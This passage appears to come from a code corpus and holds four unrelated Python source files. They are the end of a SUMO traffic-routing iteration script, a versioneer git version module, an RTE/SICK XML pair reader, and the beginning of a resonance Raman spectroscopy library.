doing") optParser.add_option("-C", "--continue-on-unbuild", action="store_true", dest="continueOnUnbuild", default=False, help="continues on unbuild routes") optParser.add_option("-w", "--disable-warnings", action="store_true", dest="noWarnings", default=False, help="disables warnings") optParser.add_option("-n", "--net-file", dest="net", help="SUMO network (mandatory)", metavar="FILE") optParser.add_option("-t", "--trips", dest="trips", help="trips in step 0 (this or flows is mandatory)", metavar="FILE") optParser.add_option("-F", "--flows", help="flows in step 0 (this or trips is mandatory)", metavar="FILE") optParser.add_option("-+", "--additional", dest="additional", default="", help="Additional files") optParser.add_option("-b", "--begin", dest="begin", type="int", default=0, help="Set simulation/routing begin [default: %default]") optParser.add_option("-e", "--end", dest="end", type="int", help="Set simulation/routing end [default: %default]") optParser.add_option("-R", "--route-steps", dest="routeSteps", type="int", default=200, help="Set simulation route steps [default: %default]") optParser.add_option("-a", "--aggregation", dest="aggregation", type="int", default=900, help="Set main weights aggregation period [default: %default]") optParser.add_option("-A", "--gA", dest="gA", type="float", default=.5, help="Sets Gawron's Alpha [default: %default]") optParser.add_option("-B", "--gBeta", dest="gBeta", type="float", default=.9, help="Sets Gawron's Beta [default: %default]") optParser.add_option("-f", "--first-step", dest="firstStep", type="int", default=0, help="First DUA step [default: %default]") optParser.add_option("-l", "--last-step", dest="lastStep", type="int", default=50, help="Last DUA step [default: %default]") optParser.add_option("-p", "--path", dest="path", default=os.environ.get("SUMO_BINDIR", ""), help="Path to binaries [default: %default]") optParser.add_option("-y", "--absrand", dest="absrand", action="store_true", default=False, help="use current time to generate random number") optParser.add_option("-c", "--cost-function", dest="costfunc", default="identity", help="(python) function to use as cost function") (options, args) = optParser.parse_args() if not options.net or not (options.trips or options.flows): optParser.error("At least --net-file and --trips or --flows have to be given!") duaBinary = os.environ.get("DUAROUTER_BINARY", os.path.join(options.path, "duarouter")) log = open("dua-log.txt", "w+") parser = make_parser() reader = NetReader() parser.setContentHandler(reader) parser.parse(options.net) edges = reader.getEdges() if "." in options.costfunc: idx = options.costfunc.rfind(".") module = options.costfunc[:idx] func = options.costfunc[idx+1:] exec("from %s import %s as costFunction" % (module, func)) else: exec("costFunction = %s" % options.costfunc) if options.flows: tripFiles = options.flows.split(",") else: tripFiles = options.trips.split(",") starttime = datetime.now() for step in range(options.firstStep, options.lastStep): btimeA = datetime.now() print "> Executing step " + str(step) # router files = [] for tripFile in tripFiles: file = tripFile tripFile = os.path.basename(tripFile) if step>0: file = tripFile[:tripFile.find(".")] + "_%s.rou.alt.xml" % (step-1) output = tripFile[:tripFile.find(".")] + "_%s.rou.xml" % step print ">> Running router with " + file btime = datetime.now() print ">>> Begin time: %s" % btime writeRouteConf(step, options, file, output) retCode = call([duaBinary, "-c", "iteration_%s.duarcfg" % step], log) etime = datetime.now() print ">>> End time: %s" % etime print ">>> Duration: %s" % (etime-btime) print "<<" files.append(output) # generating weights file print ">> Generating weights" reader = RouteReader() parser.setContentHandler(reader) for f in files: parser.parse(f) generateWeights(step, options, edges, reader, costFunction) print "<<" print "< Step %s ended (duration: %s)" % (step, datetime.now() - btimeA) print "------------------\n" sys.stdout.flush() print "dua-iterate ended (duration: %s)" % (datetime.now() - starttime) log.close()
jacobtomlinson/datapoint-python
datapoint/_version.py
# This file helps to compute a version number in source trees obtained from # git-archive tarball (such as those provided by githubs download-from-tag # feature). Distribution tarballs (built by setup.py sdist) and build # directories (produced by setup.py build) will contain a much shorter file # that just contains the computed version number. # This file is released into the public domain. Generated by # versioneer-0.18 (https://github.com/warner/python-versioneer) """Git implementation of _version.py.""" import errno import os import re import subprocess import sys def get_keywords(): """Get the keywords needed to look up the version information.""" # these strings will be replaced by git during git-archive. # setup.py/versioneer.py will grep for the variable names, so they must # each be defined on a line of their own. _version.py will just call # get_keywords(). git_refnames = "$Format:%d$" git_full = "$Format:%H$" git_date = "$Format:%ci$" keywords = {"refnames": git_refnames, "full": git_full, "date": git_date} return keywords class VersioneerConfig: """Container for Versioneer configuration parameters.""" def get_config(): """Create, populate and return the VersioneerConfig() object.""" # these strings are filled in when 'setup.py versioneer' creates # _version.py cfg = VersioneerConfig() cfg.VCS = "git" cfg.style = "" cfg.tag_prefix = "" cfg.parentdir_prefix = "None" cfg.versionfile_source = "datapoint/_version.py" cfg.verbose = False return cfg class NotThisMethod(Exception): """Exception raised if a method is not valid for the current scenario.""" LONG_VERSION_PY = {} HANDLERS = {} def register_vcs_handler(vcs, method): # decorator """Decorator to mark a method as the handler for a particular VCS.""" def decorate(f): """Store f in HANDLERS[vcs][method].""" if vcs not in HANDLERS: HANDLERS[vcs] = {} HANDLERS[vcs][method] = f return f return decorate def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False, env=None): """Call the given command(s).""" assert isinstance(commands, list) p = None for c in commands: try: dispcmd = str([c] + args) # remember shell=False, so use git.cmd on windows, not just git p = subprocess.Popen([c] + args, cwd=cwd, env=env, stdout=subprocess.PIPE, stderr=(subprocess.PIPE if hide_stderr else None)) break except EnvironmentError: e = sys.exc_info()[1] if e.errno == errno.ENOENT: continue if verbose: print("unable to run %s" % dispcmd) print(e) return None, None else: if verbose: print("unable to find command, tried %s" % (commands,)) return None, None stdout = p.communicate()[0].strip() if sys.version_info[0] >= 3: stdout = stdout.decode() if p.returncode != 0: if verbose: print("unable to run %s (error)" % dispcmd) print("stdout was %s" % stdout) return None, p.returncode return stdout, p.returncode def versions_from_parentdir(parentdir_prefix, root, verbose): """Try to determine the version from the parent directory name. Source tarballs conventionally unpack into a directory that includes both the project name and a version string. We will also support searching up two directory levels for an appropriately named parent directory """ rootdirs = [] for i in range(3): dirname = os.path.basename(root) if dirname.startswith(parentdir_prefix): return {"version": dirname[len(parentdir_prefix):], "full-revisionid": None, "dirty": False, "error": None, "date": None} else: rootdirs.append(root) root = os.path.dirname(root) # up a level if verbose: print("Tried directories %s but none started with prefix %s" % (str(rootdirs), parentdir_prefix)) raise NotThisMethod("rootdir doesn't start with parentdir_prefix") @register_vcs_handler("git", "get_keywords") def git_get_keywords(versionfile_abs): """Extract version information from the given file.""" # the code embedded in _version.py can just fetch the value of these # keywords. When used from setup.py, we don't want to import _version.py, # so we do it with a regexp instead. This function is not used from # _version.py. keywords = {} try: f = open(versionfile_abs, "r") for line in f.readlines(): if line.strip().startswith("git_refnames ="): mo = re.search(r'=\s*"(.*)"', line) if mo: keywords["refnames"] = mo.group(1) if line.strip().startswith("git_full ="): mo = re.search(r'=\s*"(.*)"', line) if mo: keywords["full"] = mo.group(1) if line.strip().startswith("git_date ="): mo = re.search(r'=\s*"(.*)"', line) if mo: keywords["date"] = mo.group(1) f.close() except EnvironmentError: pass return keywords @register_vcs_handler("git", "keywords") def git_versions_from_keywords(keywords, tag_prefix, verbose): """Get version information from git keywords.""" if not keywords: raise NotThisMethod("no keywords at all, weird") date = keywords.get("date") if date is not None: # git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant # datestamp. However we prefer "%ci" (which expands to an "ISO-8601 # -like" string, which we must then edit to make compliant), because # it's been around since git-1.5.3, and it's too difficult to # discover which version we're using, or to work around using an # older one. date = date.strip().replace(" ", "T", 1).replace(" ", "", 1) refnames = keywords["refnames"].strip() if refnames.startswith("$Format"): if verbose: print("keywords are unexpanded, not using") raise NotThisMethod("unexpanded keywords, not a git-archive tarball") refs = set([r.strip() for r in refnames.strip("()").split(",")]) # starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of # just "foo-1.0". If we see a "tag: " prefix, prefer those. TAG = "tag: " tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)]) if not tags: # Either we're using git < 1.8.3, or there really are no tags. We use # a heuristic: assume all version tags have a digit. The old git %d # expansion behaves like git log --decorate=short and strips out the # refs/heads/ and refs/tags/ prefixes that would let us distinguish # between branches and tags. By ignoring refnames without digits, we # filter out many common branch names like "release" and # "stabilization", as well as "HEAD" and "master". tags = set([r for r in refs if re.search(r'\d', r)]) if verbose: print("discarding '%s', no digits" % ",".join(refs - tags)) if verbose: print("likely tags: %s" % ",".join(sorted(tags))) for ref in sorted(tags): # sorting will prefer e.g. "2.0" over "2.0rc1" if ref.startswith(tag_prefix): r = ref[len(tag_prefix):] if verbose: print("picking %s" % r) return {"version": r, "full-revisionid": keywords["full"].strip(), "dirty": False, "error": None, "date": date} # no suitable tags, so version is "0+unknown", but full hex is still there if verbose: print("no suitable tags, using unknown + full revision id") return {"version": "0+unknown", "full-revisionid": keywords["full"].strip(), "dirty": False, "error": "no suitable tags", "date": None} @register_vcs_handler("git", "pieces_from_vcs") def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command): """Get version from 'git describe' in the root of the source tree. This only gets called if the git-archive 'subst' keywords were *not* expanded, and _version.py hasn't already been rewritten with a short version string, meaning we're inside a checked out source tree. """ GITS = ["git"] if sys.platform == "win32": GITS = ["git.cmd", "git.exe"] out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root, hide_stderr=True) if rc != 0: if verbose: print("Directory %s not under git control" % root) raise NotThisMethod("'git rev-parse --git-dir' returned error") # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty] # if there isn't one, this yields HEX[-dirty] (no NUM) describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty", "--always", "--long", "--match", "%s*" % tag_prefix], cwd=root) # --long was added in git-1.5.5 if describe_out is None: raise NotThisMethod("'git describe' failed") describe_out = describe_out.strip() full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root) if full_out is None: raise NotThisMethod("'git rev-parse' failed") full_out = full_out.strip() pieces = {} pieces["long"] = full_out pieces["short"] = full_out[:7] # maybe improved later pieces["error"] = None # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty] # TAG might have hyphens. git_describe = describe_out # look for -dirty suffix dirty = git_describe.endswith("-dirty") pieces["dirty"] = dirty if dirty: git_describe = git_describe[:git_describe.rindex("-dirty")] # now we have TAG-NUM-gHEX or HEX if "-" in git_describe: # TAG-NUM-gHEX mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe) if not mo: # unparseable. Maybe git-describe is misbehaving? pieces["error"] = ("unable to parse git-describe output: '%s'" % describe_out) return pieces # tag full_tag = mo.group(1) if not full_tag.startswith(tag_prefix): if verbose: fmt = "tag '%s' doesn't start with prefix '%s'" print(fmt % (full_tag, tag_prefix)) pieces["error"] = ("tag '%s' doesn't start with prefix '%s'" % (full_tag, tag_prefix)) return pieces pieces["closest-tag"] = full_tag[len(tag_prefix):] # distance: number of commits since tag pieces["distance"] = int(mo.group(2)) # commit: short hex revision ID pieces["short"] = mo.group(3) else: # HEX: no tags pieces["closest-tag"] = None count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"], cwd=root) pieces["distance"] = int(count_out) # total number of commits # commit date: see ISO-8601 comment in git_versions_from_keywords() date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"], cwd=root)[0].strip() pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1) return pieces def plus_or_dot(pieces): """Return a + if we don't already have one, else return a .""" if "+" in pieces.get("closest-tag", ""): return "." return "+" def render_pep440(pieces): """Build up version string, with post-release "local version identifier". Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty Exceptions: 1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty] """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"] or pieces["dirty"]: rendered += plus_or_dot(pieces) rendered += "%d.g%s" % (pieces["distance"], pieces["short"]) if pieces["dirty"]: rendered += ".dirty" else: # exception #1 rendered = "0+untagged.%d.g%s" % (pieces["distance"], pieces["short"]) if pieces["dirty"]: rendered += ".dirty" return rendered def render_pep440_pre(pieces): """TAG[.post.devDISTANCE] -- No -dirty. Exceptions: 1: no tags. 0.post.devDISTANCE """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"]: rendered += ".post.dev%d" % pieces["distance"] else: # exception #1 rendered = "0.post.dev%d" % pieces["distance"] return rendered def render_pep440_post(pieces): """TAG[.postDISTANCE[.dev0]+gHEX] . The ".dev0" means dirty. Note that .dev0 sorts backwards (a dirty tree will appear "older" than the corresponding clean one), but you shouldn't be releasing software with -dirty anyways. Exceptions: 1: no tags. 0.postDISTANCE[.dev0] """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"] or pieces["dirty"]: rendered += ".post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" rendered += plus_or_dot(pieces) rendered += "g%s" % pieces["short"] else: # exception #1 rendered = "0.post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" rendered += "+g%s" % pieces["short"] return rendered def render_pep440_old(pieces): """TAG[.postDISTANCE[.dev0]] . The ".dev0" means dirty. Eexceptions: 1: no tags. 0.postDISTANCE[.dev0] """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"] or pieces["dirty"]: rendered += ".post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" else: # exception #1 rendered = "0.post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" return rendered def render_git_describe(pieces): """TAG[-DISTANCE-gHEX][-dirty]. Like 'git describe --tags --dirty --always'. Exceptions: 1: no tags. HEX[-dirty] (note: no 'g' prefix) """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"]: rendered += "-%d-g%s" % (pieces["distance"], pieces["short"]) else: # exception #1 rendered = pieces["short"] if pieces["dirty"]: rendered += "-dirty" return rendered def render_git_describe_long(pieces): """TAG-DISTANCE-gHEX[-dirty]. Like 'git describe --tags --dirty --always -long'. The distance/hash is unconditional. Exceptions: 1: no tags. HEX[-dirty] (note: no 'g' prefix) """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] rendered += "-%d-g%s" % (pieces["distance"], pieces["short"]) else: # exception #1 rendered = pieces["short"] if pieces["dirty"]: rendered += "-dirty" return rendered def render(pieces, style): """Render the given version pieces into the requested style.""" if pieces["error"]: return {"version": "unknown", "full-revisionid": pieces.get("long"), "dirty": None, "error": pieces["error"], "date": None} if not style or style == "default": style = "pep440" # the default if style == "pep440": rendered = render_pep440(pieces) elif style == "pep440-pre": rendered = render_pep440_pre(pieces) elif style == "pep440-post": rendered = render_pep440_post(pieces) elif style == "pep440-old": rendered = render_pep440_old(pieces) elif style == "git-describe": rendered = render_git_describe(pieces) elif style == "git-describe-long": rendered = render_git_describe_long(pieces) else: raise ValueError("unknown style '%s'" % style) return {"version": rendered, "full-revisionid": pieces["long"], "dirty": pieces["dirty"], "error": None, "date": pieces.get("date")} def get_versions(): """Get version information or return default if unable to do so.""" # I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have # __file__, we can work backwards from there to the root. Some # py2exe/bbfreeze/non-CPython implementations don't do __file__, in which # case we can only use expanded keywords. cfg = get_config() verbose = cfg.verbose try: return git_versions_from_keywords(get_keywords(), cfg.tag_prefix, verbose) except NotThisMethod: pass try: root = os.path.realpath(__file__) # versionfile_source is the relative path from the top of the source # tree (where the .git directory might live) to this file. Invert # this to find the root from __file__. for i in cfg.versionfile_source.split('/'): root = os.path.dirname(root) except NameError: return {"version": "0+unknown", "full-revisionid": None, "dirty": None, "error": "unable to find root of source tree", "date": None} try: pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose) return render(pieces, cfg.style) except NotThisMethod: pass try: if cfg.parentdir_prefix: return versions_from_parentdir(cfg.parentdir_prefix, root, verbose) except NotThisMethod: pass return {"version": "0+unknown", "full-revisionid": None, "dirty": None, "error": "unable to compute version", "date": None}
nathanshartmann/portuguese_word_embeddings
sentence_similarity/utils/commons.py
# -*- coding: utf-8 -*- """ Common structures and functions used by other scripts. """ from xml.etree import cElementTree as ET str_to_entailment = {'none': 0, 'entailment': 1, 'paraphrase': 2} entailment_to_str = {v: k for k, v in str_to_entailment.items()} class Pair(object): ''' Class representing a pair of texts from SICK or RTE. It is meant to be used as an abstract representation for both. ''' def __init__(self, t, h, id_, entailment, similarity): ''' :param t: string with the text :param h: string with the hypothesis :param id_: int indicating id in the original file :param entailment: int indicating entailment class :param similarity: float ''' self.t = t self.h = h self.id = id_ self.entailment = entailment self.similarity = similarity def read_xml(filename, need_labels): ''' Read an RTE XML file and return a list of Pair objects. :param filename: name of the file to read :param need_labels: boolean indicating if labels should be present ''' pairs = [] tree = ET.parse(filename) root = tree.getroot() for xml_pair in root.iter('pair'): t = xml_pair.find('t').text h = xml_pair.find('h').text attribs = dict(xml_pair.items()) id_ = int(attribs['id']) if 'entailment' in attribs: ent_string = attribs['entailment'].lower() try: ent_value = str_to_entailment[ent_string] except ValueError: msg = 'Unexpected value for attribute "entailment" at pair {}: {}' raise ValueError(msg.format(id_, ent_string)) else: ent_value = None if 'similarity' in attribs: similarity = float(attribs['similarity']) else: similarity = None if need_labels and similarity is None and ent_value is None: msg = 'Missing both entailment and similarity values for pair {}'.format(id_) raise ValueError(msg) pair = Pair(t, h, id_, ent_value, similarity) pairs.append(pair) return pairs
ddietze/FSRStools
rraman/__init__.py
""" .. module: FSRStools.rraman :platform: Windows .. moduleauthor:: Daniel Dietze <daniel.dietze@berkeley.edu> Resonance Raman excitation profile calculation based on the time-domain picture of resonance Raman. See Myers and Mathies in *Biological Applications of Raman Spectroscopy*, Vol. 2, pp. 1-58 (John Wiley and Sons, New York, 1987) for details (referred to as Myers in the following). The code is mainly based on Myers' Fortran 77 code (see Appendix of PhD Thesis of K. M. Spillane, 2011, UC Berkeley for source code). **Changelog:** *10-7-2015:* - Added / modified functions for calculating fluorescence spectra. - Added a convenience function to calculate Raman spectra from a set of excitation profiles. - Added some more damping functions and phenomenological support for Stokes shift in simple homogeneous damping function. *10-21-2015:* - Some bug fixes concerning the prefactors and the normalization of the fluorescence spectra. - Fixed a bug regarding the Raman overlaps. **Example Code** Here is a short example calculating Myers' *Gedankenmolecule* from Myers and Mathies:: import numpy as np import FSRStools.rraman as rr # parameters: # ----------- # displacements D = np.array([1.27, 0.3, 0.7, 0.53]) # ground state frequencies RMg = np.array([1550.0, 1300.0, 1150.0, 1000.0]) # excited state frequencies RMe = np.array([1550.0, 1300.0, 1150.0, 1000.0]) # electronic zero-zero energy E0 = 20700.0 # homogeneous linewidth and shape parameter Gamma = 200.0 halpha = 0 # inhomogeneous linewidth and shape parameter sig = 400.0 ialpha = 1 # electronic transition dipole length M = 0.8 # index of refraction of surrounding medium IOR = 1.0 # time axis parameters for integrations tmax = 5000 dt = 0.2 # just calculate fundamentals nquanta = np.identity(len(RMg)) sshift = np.dot(nquanta, RMg) # calculation part # ---------------- # create axes t, wn = rr.getAxes(tmax, dt) # zero-zero energy and damping # add here all time domain stuff TDpart = rr.getHomogeneousDamping(t, Gamma, halpha) # time dependent overlap integrals OVLPS = rr.getOverlaps(t, D, RMg, RMe, nquanta) # calculate cross-sections sigmaA, sigmaR, kF = rr.getCrossSections(t, wn, E0, OVLPS, sshift, M, IOR, TDpart, sig, ialpha) .. This file is part of the FSRStools python module. The FSRStools python module is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. The FSRStools python module is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with the FSRStools python module. If not, see <http://www.gnu.org/licenses/>. Copyright 2014, 2015 Daniel Dietze <daniel.dietze@berkeley.edu>. """ import numpy as np # some constants hbar = 5308.880986 #: Planck's constant over 2 pi, hbar, in `cm-1 fs` c0 = 2.99792458e-5 #: speed of light in `cm / fs` kB = 0.695 #: Boltzman's constant in `cm-1 / K` # ------------------------------------------------------------------------------------------------------------------- # some useful functions def radperfs2wn(w): """Angular frequency (rad / fs) to wavenumber (cm-1). """ return hbar * w def wn2radperfs(e): """Wavenumber (cm-1) to angular frequency (rad / fs). """ return e / hbar def wn2lambda(w): """Convert wavenumber (cm-1) to wavelength (nm). """ return 1e7 / w def lambda2wn(w): """Convert wavelength (nm) to wavenumber (cm-1). """ return 1e7 / w def getWnIndex(wn, wn0): """Get the index into an array of wavenumbers wn with wavenumber closest to wn0. Use this function for :py:func:`getRamanSpectrum`. """ if np.amin(wn) > wn0 or np.amax(wn) < wn0: print "Warning: wn0 lies outside of wn." return np.argmin(np.absolute(wn - wn0)) def getAxes(tmax, dt): """Create time and frequency axes for the resonance Raman calculations. :param float tmax: Endpoint for time domain calculation (fs). This value should be high enough to capture the full dephasing. :param float dt: Increment of time axis (fs). This value should be small enough to capture the highest vibronic feature in the excited state. :returns: Time axis (fs) and frequency axis (cm-1). """ t = np.arange(0, tmax + dt, dt) numPoints = len(t) wn = np.arange(numPoints) / (c0 * dt * numPoints) return t, wn def molarExtinction2AbsCS(eSpctr, IOR): """Convert molar extinction (cm-1 / M) to molecular absorption cross section (A**2 / molec). See McHale, Resonance Raman Spectroscopy, Wiley, (2002), p. 545 or Myers & Mathies for details. The absorption cross section in solution has to be scaled by index of refraction unless the molar extinction has not been corrected. :param array eSpctr: Extinction spectrum in (cm-1 / M). :param float IOR: Index of refraction of surrounding solvent / medium. :returns: Absorption spectrum in units of (A**2 / molec.), same shape as eSpcrt. """ return 1e3 * np.log(10.0) * eSpctr / 6.0221e23 * 1e8 * 1e8 / IOR def diff2absRamanCS(diffRaCS, rho): """Convert the differential Raman cross section (A**2/molec sr) to absolute Raman cross section in (A**2 / molec) for a given depolarization ratio rho. :param float diffRaCS: Differential Raman cross section (A**2/molec sr). :param float rho: Associated depolarization ratio of this Raman mode. :returns: Absolute Raman cross section in (A**2 / molec). """ return 8.0 * np.pi / 3.0 * (1.0 + 2.0 * rho) / (1.0 + rho) * diffRaCS def getRamanSpectrum(wn, iEL, RMg, nquanta, sigmaR, dw=10.0, alpha=0): """ Convenience function to calculate the Raman spectrum. The spectrum is scattered power per infinitesimal frequency normalized to incident power times molecular density (cm-3) times path length (cm). See Myers, *Chem. Phys.* **180**, 215 (1994), Eq. 7 for details. :param array wn: Wavenumber axis (Stokes shift, not electronic). :param int iEL: Index into sigmaR corresponding to the pump energy of the laser. :param array RMg: Ground state Raman frequencies :param array nquanta: M x N array containing the quanta of the N possible Raman modes for the M Raman lines to calculate. Use :py:func:`numpy.identity` to just calculate the fundamentals. Possible values are 0, 1, 2. :param array sigmaR: Array of M Raman cross sections that have been calculated by :py:func:`getCrossSections` (in A**2 / molec). :param float dw: Phenomenological FWHM linewidth of the Raman lines in cm-1 (default = 10 cm-1). :param float alpha: Line shape parameter to be used for the Raman spectrum: - 1 = Gaussian - 0 = Lorentzian (default) :returns: Calculated Raman spectrum (same shape as wn). """ spectrum = np.zeros(len(wn)) if iEL < 0 or iEL >= len(sigmaR[0]): print "Error: iEL is out of range!" return spectrum # iterate over all M modes for i, nM in enumerate(nquanta): # get frequency of this mode wR = np.sum(nM * RMg) # add Lorentzian part of lineshape spectrum = spectrum + (1.0 - alpha) * sigmaR[i][iEL] * 1e-16 * (dw / (2.0 * np.pi * ((wn - wR)**2 + dw**2 / 4.0))) # add Gaussian part of lineshape spectrum = spectrum + alpha * sigmaR[i][iEL] * 1e-16 * ((2.0 * np.sqrt(np.log(2) / np.pi)) / dw * np.exp(-4.0 * np.log(2.0) * (wn - wR)**2 / dw**2)) return spectrum # ----------------------------------------------------------------------------------------------------------------------------------- # time dependent overlap integrals with equal ground and excited state vibrational frequencies # the t00 overlap does not contain the factors exp(-1j wVIB t) nor exp(-1j E0/hbar t) as these are taken care of when assembling the cross section # Myers eqs. (37) - (39) # Delta = displacement in dimensionless coordinates # eVIB = vibrational frequency (cm-1) # t = time axis in fs def t00A(t, Delta, eVIB): """Time dependent overlap integral between vibrational ground states of electronic ground and excited state with equal ground and excited state vibrational frequencies. :param array t: Time axis in (fs). :param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates. :param float eVIB: Vibrational frequency (cm-1). :returns: 0-0 overlap integral as function of time (same shape as t). .. seealso:: Myers, Eqs. (37) - (39). """ # The 0-0 overlap does not contain the factors :math:`e^{-j w_{VIB} t}` nor :math:`e^{-j E_0 / \\hbar t}` as these are taken care of when assembling the cross section. return np.exp(-Delta**2 / 2.0 * (1.0 - np.exp(-1j * eVIB / hbar * t))) def t10A(t, Delta, eVIB): """Time dependent overlap integral between vibrational ground and first excited state of electronic ground and excited state with equal ground and excited state vibrational frequencies. :param array t: Time axis in (fs). :param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates. :param float eVIB: Vibrational frequency (cm-1). :returns: 1-0 overlap integral as function of time (same shape as t). .. seealso:: Myers, Eqs. (37) - (39). """ return Delta / np.sqrt(2) * (np.exp(-1j * eVIB / hbar * t) - 1.0) # * t00A(t, Delta, eVIB) def t20A(t, Delta, eVIB): """Time dependent overlap integral between vibrational ground and second excited state of electronic ground and excited state with equal ground and excited state vibrational frequencies. :param array t: Time axis in (fs). :param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates. :param float eVIB: Vibrational frequency (cm-1). :returns: 2-0 overlap integral as function of time (same shape as t). .. seealso:: Myers, Eqs. (37) - (39). """ return Delta**2 / (2 * np.sqrt(2)) * (np.exp(-1j * eVIB / hbar * t) - 1.0)**2 # * t00A(t, Delta, eVIB) # ------------------------------------------------------------------------------------------------------------------------------------------------- # same with different frequency in ground and excited state # Myers eqs. (42) - (44) # Delta = displacement in dimensionless coordinates # eg = ground state vibrational frequency (cm-1) # ee = excited state vibrational frequency (cm-1) # t = time axis in fs def t00B(t, Delta, eg, ee): """Time dependent overlap integral between vibrational ground states of electronic ground and excited state with different ground and excited state vibrational frequencies. :param array t: Time axis in (fs). :param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates. :param float eg: Vibrational frequency in the ground state (cm-1). :param float ee: Vibrational frequency in the excited state (cm-1). :returns: 0-0 overlap integral as function of time (same shape as t). .. seealso:: Myers, Eqs. (42) - (44). """ wg = eg / hbar we = ee / hbar swe = np.sin(we * t) cwe = np.cos(we * t) pt = we / wg * Delta * swe qt = Delta * (1 - cwe) # the log reduces to 0.5 * eg / hbar * t when eg = ee # this is the factor that is taken out in the t00A case, as it cancels with the exp in the integral later on # however, np.log returns values such that -pi < arg(log(..)) < pi gt = 1j / 2.0 * np.log(1j * wg / we * swe + cwe) + pt * (qt - Delta) / 2.0 # skip -E0 t / hbar # gt = gt + wg * t / 2.0 # add +w t / 2 using ground state frequency as this compensates the -w t / 2.0 term coming from the FFT # add the following term to recover t00A for eg = ee gt = gt - 1j / 2.0 * np.log(1j * np.sin(wg * t) + np.cos(wg * t)) at = -0.5 * 1j * (1j * cwe - (we / wg) * swe) / (1j * (wg / we) * swe + cwe) a = at + 0.5 pp = pt - 2.0 * 1j * at * qt gp = 1j * at * qt**2 - pt * qt + gt return a**(-0.5) * np.exp(-pp**2 / (4.0 * a)) * np.exp(1j * gp) def t10B(t, Delta, eg, ee): """Time dependent overlap integral between vibrational ground and first excited state of electronic ground and excited state with different ground and excited state vibrational frequencies. :param array t: Time axis in (fs). :param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates. :param float eg: Vibrational frequency in the ground state (cm-1). :param float ee: Vibrational frequency in the excited state (cm-1). :returns: 1-0 overlap integral as function of time (same shape as t). .. seealso:: Myers, Eqs. (42) - (44). """ wg = eg / hbar we = ee / hbar swe = np.sin(we * t) cwe = np.cos(we * t) pt = we / wg * Delta * swe qt = Delta * (1 - cwe) at = -0.5 * 1j * (1j * cwe - (we / wg) * swe) / (1j * (wg / we) * swe + cwe) a = at + 0.5 pp = pt - 2.0 * 1j * at * qt return 2**(-0.5) * pp / (1j * a) # * t00B(t, Delta, eg, ee) def t20B(t, Delta, eg, ee): """Time dependent overlap integral between vibrational ground and second excited state of electronic ground and excited state with different ground and excited state vibrational frequencies. :param array t: Time axis in (fs). :param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates. :param float eg: Vibrational frequency in the ground state (cm-1). :param float ee: Vibrational frequency in the excited state (cm-1). :returns: 2-0 overlap integral as function of time (same shape as t). .. seealso:: Myers, Eqs. (42) - (44). """ wg = eg / hbar we = ee / hbar swe = np.sin(we * t) cwe = np.cos(we * t) pt = we / wg * Delta * swe qt = Delta * (1 - cwe) at = -0.5 * 1j * (1j * cwe - (we / wg) * swe) / (1j * (wg / we) * swe + cwe) a = at + 0.5 pp = pt - 2.0 * 1j * at * qt return -8**(-0.5) * (pp**2 / a**2 + 2. * (1. - 1. / a)) # * t00B(t, Delta, eg, ee) # ---------------------------------------------------------------------------------------------------------------------------------- # same for linear dissociative excited state surfaces # Myers eqs. (52) - (54) # beta = slope of potential energy surface (dV / dq) in cm-1 (q is dimensionless coordinate) # eVIB = vibrational frequency (cm-1) def t00D(t, beta, eVIB): """Time dependent overlap integral between vibrational ground states of electronic ground and excited state with a linear dissociative excited state surface along this vibrational coordinate. :param array t: Time axis in (fs). :param float beta: Slope of excited state potential energy surface (dV / dq) in (cm-1) (q is dimensionless coordinate). :param float eVIB: Vibrational frequency (cm-1). :returns: 0-0 overlap integral as function of time (same shape as t). .. seealso:: Myers, Eqs. (52) - (54). """ tmp = (1.0 + 1j * eVIB / hbar * t / 2.0)**(-0.5) * np.exp(-beta**2 * (6 * t**2 + 1j * eVIB / hbar * t**3) / (24 * hbar**2)) tmp = tmp * np.exp(1j * eVIB / hbar * t / 2.0) # add this term to compensate for the -1j w t / 2 term coming from the FFt return tmp def t10D(t, beta, eVIB): """Time dependent overlap integral between vibrational ground and first excited state of electronic ground and excited state with a linear dissociative excited state surface along this vibrational 